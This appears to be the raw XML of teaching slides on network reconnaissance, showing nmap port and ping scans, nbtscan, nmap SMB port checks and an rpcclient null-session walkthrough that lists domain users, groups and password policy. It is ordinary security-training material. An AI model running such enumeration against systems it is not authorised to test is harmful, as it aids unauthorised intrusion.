              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 45.33.32.156 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan all ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 45.33.32.156 –p 1-65535</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan network range – also supports CIDR notation 10.0.0.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –v –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 10.0.0.0-255</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376927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4581-89B0-2245-9740-C010927CDB0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap - Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB7F5C59-43DD-C94E-AFE1-49C56C06AFB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starting Nmap 7.80 ( https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ) at 2019-10-19 02:35 EDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap scan report for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scanme.nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (45.33.32.156)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host is up (1.0s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not shown: 996 closed ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PORT      STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    open  http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>9929/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-echo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>31337/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> open  Elite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1992163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96D4B-BBB6-644A-B3FE-35D61CA2B43C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap – Common Switches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{188D6137-236B-C44C-9D77-D5F859190A30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-A Enable OS detection, version detection, script scanning, and traceroute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-O Enable OS detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Probe open ports to determine service/version info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> TCP SYN scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> TCP Connect() scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> TCP ACK scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> UDP Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-v Increase verbosity level (use -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or more for greater effect)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Ping Scan - disable port scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Treat all hosts as online -- skip host discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2456081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654B-7E3C-B24D-AF01-6F5E41D7A4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB Discovery - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nbtscan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9E2D9E-C747-554B-9FD2-45C9223B7AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nbtscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -r 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doing NBT name scan for addresses from 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP address       NetBIOS Name     Server    User             MAC address      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>------------------------------------------------------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>127.0.0.1        &lt;unknown&gt;                  &lt;unknown&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16808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95AA6-0A95-1642-976B-5265DF04225A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB Discovery - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3221730-180A-6642-A085-C982D16AB38F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -U “” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>windows_IP_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>your_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter     ‘s password:		Press Enter key without typing a password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>srvinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Get OS version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enumdomusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		List users on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enumdomgroups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	List groups on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getdompwinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Get password policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>querygroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x204	Get info on specified group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>querygroupmem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x204 	List users in group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>queryuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x3e8	Get info on specified user</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426483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654B-7E3C-B24D-AF01-6F5E41D7A4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB Discovery - Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9E2D9E-C747-554B-9FD2-45C9223B7AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> -v -p 139,445 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Starting Nmap 7.80 ( https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> ) at 2019-10-19 02:59 EDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Initiating SYN Stealth Scan at 02:59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Scanning localhost (127.0.0.1) [2 ports]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Discovered open port 139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> on 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Discovered open port 445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> on 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Completed SYN Stealth Scan at 02:59, 0.03s elapsed (2 total ports)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Nmap scan report for localhost (127.0.0.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Host is up (0.00017s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>PORT    STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>139/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>netbios-ssn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>-ds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3021895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654B-7E3C-B24D-AF01-6F5E41D7A4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB Discovery – Nmap SMB script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9E2D9E-C747-554B-9FD2-45C9223B7AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
